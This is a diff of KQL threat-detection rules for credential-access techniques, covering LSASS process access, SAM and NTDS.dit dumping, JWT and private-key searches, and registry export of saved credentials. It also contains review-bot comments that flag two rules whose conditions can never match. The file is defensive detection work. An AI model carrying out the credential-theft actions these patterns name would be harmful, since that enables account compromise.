+// Author: Austin Songer @austinsonger, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-11-26
+// Level: high
+// Description: Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder.
+// Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceProcessEvents
 | where (FolderPath contains "\\Microsoft Visual Studio\\" and FolderPath endswith "\\dump64.exe" and FolderPath startswith ":\\Program Files") and (ProcessVersionInfoOriginalFileName =~ "procdump" or (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " -mp "))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql b/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql
index 785fe69a..c7a80863 100644
--- a/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql
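Review bot: `FolderPath startswith ":\\Program Files"` on the query line can never match, because FolderPath values begin with a drive letter rather than a colon, so the AND makes this rule dead even though the `\\Microsoft Visual Studio\\` and `\\dump64.exe` conditions are correct. This looks like a source-rule "drive-agnostic" prefix carried over literally; in KQL the equivalent is a substring test such as `FolderPath contains ":\\Program Files"`, which still excludes user-writable locations as intended. The hunk's removed and added header lines appear identical (presumably a line-ending change) and the query is unchanged context, so the defect predates the commit, but the converter should not emit a `startswith` whose operand begins with `:` since it will silently disable every rule using that idiom.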
+++ b/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql
@@ -1,11 +1,11 @@
-// Title: Potentially Suspicious Command Targeting Teams Sensitive Files
-// Author: @SerkinValery
-// Date: 2022-09-16
-// Level: medium
-// Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.
-// The database might contain authentication tokens and other sensitive information about the logged in accounts.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1528
-
-DeviceProcessEvents
+// Title: Potentially Suspicious Command Targeting Teams Sensitive Files
+// Author: @SerkinValery
+// Date: 2022-09-16
+// Level: medium
+// Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams.
+// The database might contain authentication tokens and other sensitive information about the logged in accounts.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\Microsoft\\Teams\\Cookies" or ProcessCommandLine contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(FolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql b/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql
index 2f1b5339..a0a3c7e4 100644
--- a/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql
+++ b/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql
@@ -1,13 +1,13 @@
-// Title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
-// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2022-09-09
-// Level: medium
-// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
-// This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.discovery, attack.t1552
-// False Positives:
-// - Legitimate usage of the utility by administrators to query the event log
-
-DeviceProcessEvents
+// Title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities
+// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
+// Date: 2022-09-09
+// Level: medium
+// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
+// This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.discovery, attack.t1552
+// False Positives:
+// - Legitimate usage of the utility by administrators to query the event log
+
+DeviceProcessEvents
 | where (((ProcessCommandLine contains "-InstanceId 462") or (ProcessCommandLine contains ".eventid -eq 462") or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "System[EventID=462" and ProcessCommandLine contains "]") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains ".eventid -eq 4778" or ProcessCommandLine contains "System[EventID=4778]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains ".eventid -eq 25" or ProcessCommandLine contains "System[EventID=25]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25")) or (ProcessCommandLine contains "Microsoft-Windows-PowerShell" or ProcessCommandLine contains "Microsoft-Windows-Security-Auditing" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-RemoteConnectionManager" or ProcessCommandLine contains "Microsoft-Windows-Windows Defender" or ProcessCommandLine contains "PowerShellCore" or ProcessCommandLine contains "Security" or ProcessCommandLine contains "Windows PowerShell")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog "))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql b/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql
index 5a664c76..c09efbd5 100644
--- a/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql
+++ b/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql
@@ -1,12 +1,12 @@
-// Title: Potentially Suspicious JWT Token Search Via CLI
-// Author: Nasreddine Bencherchali (Nextron Systems), kagebunsher
-// Date: 2022-10-25
-// Level: medium
-// Description: Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG".
-// JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others.
-// Threat actors may search for these tokens to steal them for lateral movement or privilege escalation.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1528, attack.t1552.001
-
-DeviceProcessEvents
+// Title: Potentially Suspicious JWT Token Search Via CLI
+// Author: Nasreddine Bencherchali (Nextron Systems), kagebunsher
+// Date: 2022-10-25
+// Level: medium
+// Description: Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG".
+// JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others.
+// Threat actors may search for these tokens to steal them for lateral movement or privilege escalation.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1528, attack.t1552.001
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "eyJ0eXAiOi" or ProcessCommandLine contains "eyJhbGciOi" or ProcessCommandLine contains " eyJ0eX" or ProcessCommandLine contains " \"eyJ0eX\"" or ProcessCommandLine contains " 'eyJ0eX'" or ProcessCommandLine contains " eyJhbG" or ProcessCommandLine contains " \"eyJhbG\"" or ProcessCommandLine contains " 'eyJhbG'") and (ProcessCommandLine contains "find " or ProcessCommandLine contains "find.exe" or ProcessCommandLine contains "findstr" or ProcessCommandLine contains "select-string " or ProcessCommandLine contains "strings")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql b/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql
index aebafd8b..243c576f 100644
--- a/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql
+++ b/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql
@@ -1,12 +1,12 @@
-// Title: Potentially Suspicious ODBC Driver Registered
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023-05-23
-// Level: high
-// Description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.persistence, attack.t1003
-// False Positives:
-// - Unlikely
-
-DeviceRegistryEvents
+// Title: Potentially Suspicious ODBC Driver Registered
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-23
+// Level: high
+// Description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.persistence, attack.t1003
+// False Positives:
+// - Unlikely
+
+DeviceRegistryEvents
 | where (RegistryValueData contains ":\\PerfLogs\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Registration\\CRMLog" or RegistryValueData contains ":\\Windows\\System32\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\System32\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\drivers\\color\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\PRINTERS\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\SERVERS\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks_Migrated\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\Tasks\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains ":\\Windows\\Tracing\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\") and RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*" and (RegistryKey endswith "\\Driver" or RegistryKey endswith "\\Setup")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/powershell_get_process_lsass.kql b/KQL/rules/Credential Access/powershell_get_process_lsass.kql
index 75596c70..7350a45e 100644
--- a/KQL/rules/Credential Access/powershell_get_process_lsass.kql
+++ b/KQL/rules/Credential Access/powershell_get_process_lsass.kql
@@ -1,10 +1,10 @@
-// Title: PowerShell Get-Process LSASS
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-04-23
-// Level: high
-// Description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.004
-
-DeviceProcessEvents
+// Title: PowerShell Get-Process LSASS
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-04-23
+// Level: high
+// Description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.004
+
+DeviceProcessEvents
 | where ProcessCommandLine contains "Get-Process lsas" or ProcessCommandLine contains "ps lsas" or ProcessCommandLine contains "gps lsas"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/powershell_sam_copy.kql b/KQL/rules/Credential Access/powershell_sam_copy.kql
index 5400fcef..7852a2fb 100644
--- a/KQL/rules/Credential Access/powershell_sam_copy.kql
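Review bot: The ODBC rule's key filter in this hunk can never match: `RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*"` treats the `*` as a literal character (KQL `endswith` has no wildcard support) and is ANDed with `RegistryKey endswith "\\Driver" or RegistryKey endswith "\\Setup"`, so no key can satisfy both suffixes at once. The intent is evidently a path-prefix match, so `RegistryKey contains "\\SOFTWARE\\ODBC\\ODBCINST.INI\\" and (RegistryKey endswith "\\Driver" or RegistryKey endswith "\\Setup")` would restore the detection; it is worth checking whether the converter emits `endswith` with a trailing `*` for other rules as well. Separately, every header line in this and the neighbouring hunks is removed and re-added with identical text, which reads as a line-ending normalization; declaring `eol` in `.gitattributes` would keep future rule edits reviewable.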
+++ b/KQL/rules/Credential Access/powershell_sam_copy.kql
@@ -1,13 +1,13 @@
-// Title: PowerShell SAM Copy
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-07-29
-// Level: high
-// Description: Detects suspicious PowerShell scripts accessing SAM hives
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.002
-// False Positives:
-// - Some rare backup scenarios
-// - PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs
-
-DeviceProcessEvents
+// Title: PowerShell SAM Copy
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-07-29
+// Level: high
+// Description: Detects suspicious PowerShell scripts accessing SAM hives
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.002
+// False Positives:
+// - Some rare backup scenarios
+// - PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\HarddiskVolumeShadowCopy" and ProcessCommandLine contains "System32\\config\\sam") and (ProcessCommandLine contains "Copy-Item" or ProcessCommandLine contains "cp $_." or ProcessCommandLine contains "cpi $_." or ProcessCommandLine contains "copy $_." or ProcessCommandLine contains ".File]::Copy(")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql b/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql
index f8744d66..661a302c 100644
--- a/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql
+++ b/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql
@@ -1,10 +1,10 @@
-// Title: Private Keys Reconnaissance Via CommandLine Tools
-// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-07-20
-// Level: medium
-// Description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.004
-
-DeviceProcessEvents
+// Title: Private Keys Reconnaissance Via CommandLine Tools
+// Author: frack113, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-07-20
+// Level: medium
+// Description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.004
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains ".key" or ProcessCommandLine contains ".pgp" or ProcessCommandLine contains ".gpg" or ProcessCommandLine contains ".ppk" or ProcessCommandLine contains ".p12" or ProcessCommandLine contains ".pem" or ProcessCommandLine contains ".pfx" or ProcessCommandLine contains ".cer" or ProcessCommandLine contains ".p7b" or ProcessCommandLine contains ".asc") and ((ProcessCommandLine contains "dir " and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or (ProcessCommandLine contains "Get-ChildItem " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) or (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql b/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql
index 5ae8bf20..bac09fa4 100644
--- a/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql
+++ b/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql
@@ -1,12 +1,12 @@
-// Title: Process Memory Dump via RdrLeakDiag.EXE
-// Author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021-09-24
-// Level: high
-// Description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.001
-// False Positives:
-// - Unlikely
-
-DeviceProcessEvents
+// Title: Process Memory Dump via RdrLeakDiag.EXE
+// Author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-09-24
+// Level: high
+// Description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "-memdmp" or ProcessCommandLine contains "/memdmp" or ProcessCommandLine contains "–memdmp" or ProcessCommandLine contains "—memdmp" or ProcessCommandLine contains "―memdmp" or ProcessCommandLine contains "fullmemdmp") and (ProcessCommandLine contains " -o " or ProcessCommandLine contains " /o " or ProcessCommandLine contains " –o " or ProcessCommandLine contains " —o " or ProcessCommandLine contains " ―o " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " /p " or ProcessCommandLine contains " –p " or ProcessCommandLine contains " —p " or ProcessCommandLine contains " ―p ") and (FolderPath endswith "\\rdrleakdiag.exe" or ProcessVersionInfoOriginalFileName =~ "RdrLeakDiag.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql b/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql
index 04b58745..e721b309 100644
--- a/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql
+++ b/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql
@@ -1,12 +1,12 @@
-// Title: PUA - DIT Snapshot Viewer
-// Author: Furkan Caliskan (@caliskanfurkan_)
-// Date: 2020-07-04
-// Level: high
-// Description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.003
-// False Positives:
-// - Legitimate admin usage
-
-DeviceProcessEvents
+// Title: PUA - DIT Snapshot Viewer
+// Author: Furkan Caliskan (@caliskanfurkan_)
+// Date: 2020-07-04
+// Level: high
+// Description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+// False Positives:
+// - Legitimate admin usage
+
+DeviceProcessEvents
 | where FolderPath endswith "\\ditsnap.exe" or ProcessCommandLine contains "ditsnap.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/pua_mouse_lock_execution.kql b/KQL/rules/Credential Access/pua_mouse_lock_execution.kql
index a438a4e9..f0a29b3f 100644
--- a/KQL/rules/Credential Access/pua_mouse_lock_execution.kql
+++ b/KQL/rules/Credential Access/pua_mouse_lock_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - Mouse Lock Execution
-// Author: Cian Heasley
-// Date: 2020-08-13
-// Level: medium
-// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.collection, attack.t1056.002
-// False Positives:
-// - Legitimate uses of Mouse Lock software
-
-DeviceProcessEvents
+// Title: PUA - Mouse Lock Execution
+// Author: Cian Heasley
+// Date: 2020-08-13
+// Level: medium
+// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.collection, attack.t1056.002
+// False Positives:
+// - Legitimate uses of Mouse Lock software
+
+DeviceProcessEvents
 | where ProcessVersionInfoProductName contains "Mouse Lock" or ProcessVersionInfoCompanyName contains "Misc314" or ProcessCommandLine contains "Mouse Lock_"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql b/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql
index 8dfa441e..24861905 100644
--- a/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql
+++ b/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql
@@ -1,12 +1,12 @@
-// Title: PUA - WebBrowserPassView Execution
-// Author: frack113
-// Date: 2022-08-20
-// Level: medium
-// Description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1555.003
-// False Positives:
-// - Legitimate use
-
-DeviceProcessEvents
+// Title: PUA - WebBrowserPassView Execution
+// Author: frack113
+// Date: 2022-08-20
+// Level: medium
+// Description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1555.003
+// False Positives:
+// - Legitimate use
+
+DeviceProcessEvents
 | where ProcessVersionInfoFileDescription =~ "Web Browser Password Viewer" or FolderPath endswith "\\WebBrowserPassView.exe"
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql b/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql
index e4df5719..3d9c14fc 100644
--- a/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql
+++ b/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql
@@ -1,11 +1,11 @@
-// Title: Registry Export of Third-Party Credentials
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-05-22
-// Level: high
-// Description: Detects the use of reg.exe to export registry paths associated with third-party credentials.
-// Credential stealers have been known to use this technique to extract sensitive information from the registry.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1552.002
-
-DeviceProcessEvents
+// Title: Registry Export of Third-Party Credentials
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-05-22
+// Level: high
+// Description: Detects the use of reg.exe to export registry paths associated with third-party credentials.
+// Credential stealers have been known to use this technique to extract sensitive information from the registry.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1552.002
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys" or ProcessCommandLine contains "\\Software\\Sota\\FFFTP" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin") and (ProcessCommandLine contains "save" or ProcessCommandLine contains "export") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql b/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql
index ef376f0c..1f2cc434 100644
--- a/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql
+++ b/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql
@@ -1,10 +1,10 @@
-// Title: Renamed BrowserCore.EXE Execution
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022-06-02
-// Level: high
-// Description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.defense-evasion, attack.t1528, attack.t1036.003
-
-DeviceProcessEvents
+// Title: Renamed BrowserCore.EXE Execution
+// Author: Max Altgelt (Nextron Systems)
+// Date: 2022-06-02
+// Level: high
+// Description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens)
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.defense-evasion, attack.t1528, attack.t1036.003
+
+DeviceProcessEvents
 | where ProcessVersionInfoOriginalFileName =~ "BrowserCore.exe" and (not(FolderPath endswith "\\BrowserCore.exe"))
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql b/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql
index 46c9bc5e..da17967d 100644
--- a/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql
+++ b/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql
@@ -1,13 +1,13 @@
-// Title: Sensitive File Dump Via Wbadmin.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2024-05-10
-// Level: high
-// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
-// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.003
-// False Positives:
-// - Legitimate backup operation by authorized administrators. Matches must be investigated and allowed on a case by case basis.
-
-DeviceProcessEvents
+// Title: Sensitive File Dump Via Wbadmin.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2024-05-10
+// Level: high
+// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
+// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+// False Positives:
+// - Legitimate backup operation by authorized administrators. Matches must be investigated and allowed on a case by case basis.
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "start" or ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") and (ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql
index 484f1b7d..61a5e691 100644
--- a/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql
+++ b/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql
@@ -1,11 +1,11 @@
-// Title: Sensitive File Recovery From Backup Via Wbadmin.EXE
-// Author: Nasreddine Bencherchali (Nextron Systems), frack113
-// Date: 2024-05-10
-// Level: high
-// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
-// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
-// MITRE Tactic: Credential Access
-// Tags: attack.credential-access, attack.t1003.003
-
-DeviceProcessEvents
+// Title: Sensitive File Recovery From Backup Via Wbadmin.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems), frack113
+// Date: 2024-05-10
+// Level: high
+// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive.
+// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.003
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit") and (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE")
\ No newline at end of file
diff --git a/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql b/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql
index 8013e5e0..44af7700 100644
--- a/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql
